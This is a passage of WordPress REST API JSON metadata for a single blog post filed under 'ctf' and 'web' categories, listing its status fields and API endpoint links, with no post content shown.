[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,2],"tags":[],"class_list":["post-133","post","type-post","status-publish","format-standard","hentry","category-ctf","category-web"],"_links":{"self":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/133","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=133"}],"version-history":[{"count":7,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/133\/revisions"}],"predecessor-version":[{"id":187,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/133\/revisions\/187"}],"wp:attachment":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=133"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=133"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=133"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}